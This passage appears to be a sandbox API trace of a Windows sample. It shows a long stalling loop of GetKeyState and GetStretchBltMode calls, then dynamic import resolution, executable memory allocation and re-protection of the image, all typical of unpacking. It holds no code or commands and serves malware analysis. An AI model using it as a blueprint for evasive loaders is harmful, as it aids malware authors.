0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.226] GetStretchBltMode (hdc=0x1) returned 0 [0063.226] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.227] GetStretchBltMode (hdc=0x1) returned 0 [0063.227] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.228] GetStretchBltMode (hdc=0x1) returned 0 [0063.228] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.229] GetStretchBltMode (hdc=0x1) returned 0 [0063.229] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.230] GetKeyState (nVirtKey=1) returned 0 [0063.230] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.231] GetKeyState (nVirtKey=1) returned 0 [0063.231] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.232] GetKeyState (nVirtKey=1) returned 0 [0063.232] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.233] GetStretchBltMode (hdc=0x1) returned 0 [0063.233] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.234] GetKeyState (nVirtKey=1) returned 0 [0063.234] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.235] GetStretchBltMode (hdc=0x1) returned 0 [0063.235] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.236] GetKeyState (nVirtKey=1) returned 0 [0063.236] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.237] GetStretchBltMode (hdc=0x1) returned 0 [0063.237] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.238] GetKeyState (nVirtKey=1) returned 0 [0063.238] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.239] GetKeyState (nVirtKey=1) returned 0 [0063.239] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.240] GetKeyState (nVirtKey=1) returned 0 [0063.240] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.241] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.241] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.241] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.241] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.241] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.241] GetStretchBltMode (hdc=0x1) returned 0 [0063.241] GetKeyState (nVirtKey=1) returned 0 [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0063.245] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0063.246] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0063.246] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0063.246] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAlloc") returned 0x76c1e365 [0063.246] VirtualAlloc (lpAddress=0x0, dwSize=0xe200, flAllocationType=0x3000, flProtect=0x40) returned 0x220000 [0063.248] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 1 [0063.252] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0063.252] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0063.252] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0063.252] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="_chkstk") returned 0x77c7ad68 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0063.253] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="memcmp") returned 0x77c72265 [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="NtUnmapViewOfSection") returned 0x77c5fc70 [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0063.254] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0063.255] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0063.255] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldvrm") returned 0x77c6f880 [0063.255] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0063.255] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0063.255] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0063.255] GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExW") returned 0x77320196 [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimW") returned 0x773031bc [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrW") returned 0x77303ef0 [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="StrCmpNW") returned 0x77305cc4 [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0063.256] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0063.256] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0063.257] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0063.258] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 